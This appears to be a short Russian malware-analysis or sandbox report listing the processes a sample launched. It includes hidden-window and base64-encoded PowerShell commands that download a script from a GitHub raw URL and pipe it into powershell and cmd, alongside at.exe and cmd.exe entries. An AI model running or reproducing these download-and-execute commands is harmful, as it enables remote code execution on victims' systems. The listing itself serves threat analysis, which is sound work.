Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden "powershell{$a='(iwr "https://raw.githubusercontent.com/rannumarres/f/refs/heads/main/f" -UseBasicParsing).Content';if($a){powershell $a | cmd}}"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedCommand JABhAD0AJwAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwByAGEAbgBuAHUAbQBhAHIAcgBlAHMALwBmAC8AcgBlAGYAcwAvAGgAZQBhAGQAc...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "(iwr https://raw.githubusercontent.com/rannumarres/f/refs/heads/main/f -UseBasicParsing).Content"
- '<SYSTEM32>\at.exe' line:1 char:5
- '<SYSTEM32>\cmd.exe'